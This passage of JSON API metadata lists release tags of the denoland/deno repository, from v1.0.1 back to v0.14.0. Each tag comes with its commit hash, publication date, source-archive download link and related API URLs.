itHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912